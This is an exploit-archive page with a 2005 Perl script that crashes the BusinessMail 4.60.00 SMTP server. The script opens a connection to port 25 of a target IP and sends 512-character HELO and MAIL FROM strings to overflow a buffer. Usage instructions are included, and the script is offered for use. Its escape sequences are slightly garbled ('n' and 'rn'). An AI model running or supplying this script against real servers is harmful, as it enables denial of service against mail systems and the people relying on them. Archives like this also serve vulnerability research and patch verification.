[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit
# Published : 2005-07-30
# Author : Reed Arvin
# Previous Title : ProRat Server <= 1.9 (Fix-2) Buffer Overflow Crash Exploit
# Next Title : FTPshell Server <= 3.38 Remote Denial of Service Exploit


#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
#        BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...n";

        sleep(1);

        print $socket "HELO " . "A" x 512 . "rn";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 512 . "rn";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25n";
}
#===== Start BusMail_SMTPDOS.pl =====

# www.Syue.com [2005-07-30]